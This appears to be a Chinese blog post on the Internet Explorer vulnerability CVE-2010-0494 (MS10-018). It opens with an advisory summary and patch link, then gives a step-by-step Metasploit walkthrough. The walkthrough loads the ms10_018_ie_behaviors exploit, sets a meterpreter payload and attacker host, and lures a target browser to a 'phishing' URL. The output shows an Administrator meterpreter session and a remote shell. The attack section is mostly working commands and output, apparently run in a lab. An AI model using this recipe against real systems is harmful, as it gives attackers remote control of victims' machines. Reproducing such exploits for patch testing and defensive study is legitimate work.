一、漏洞简介
BUGTRAQ ID: 39047 CVE ID: CVE-2010-0494
Internet Explorer是Windows操作系统中默认捆绑的web浏览器。
Internet Explorer中存在信息泄露漏洞,可能允许脚本访问其他域或Internet Explorer区中的浏览器窗口。攻击者可以通过创建特制网页来利用这个漏洞,如果用户查看了网页并跨第二个浏览器窗口拖拉了该窗口,就会导致信息泄露。
Microsoft Internet Explorer 8.0 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 临时解决方法:
- 在Office 2007中禁用ActiveX控件。
- 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
- 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
- 不要打开意外的文件。
厂商补丁:
Microsoft
Microsoft已经为此发布了一个安全公告(MS10-018)以及相应补丁: MS10-018:Cumulative Security Update for Internet Explorer (980182) 链接:http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true
二、漏洞复原
1、进入msf
msfconsole
2、搜索漏洞
search ms10_018
3、进入漏洞模块
use exploit/windows/browser/ms10_018_ie_behaviors
4、 查看漏洞使用方法
show options
5、设置攻击者ip
msf5 exploit(windows/browser/ms10_018_ie_behaviors) > set SRVHOST 10.0.0.8
SRVHOST => 10.0.0.8
6、设置PAYLOAD
msf5 exploit(windows/browser/ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
7、设置端口
msf5 exploit(windows/browser/ms10_018_ie_behaviors) > set LPORT 4441
LPORT => 4441
8、运行
run
9、使用靶机访问钓鱼地址
http://10.0.0.8:8080/IGP3dL3G
10、查看session
sessions -i
1 meterpreter x64/windows LIANGZEYU-01\Administrator @ LIANGZEYU-01 10.0.0.8:34659 -> 10.0.0.7:4441 (10.0.0.7)
11、进入session
session -i 1
12、进入shell
shell
有问题请加博主微信进行沟通!
全部评论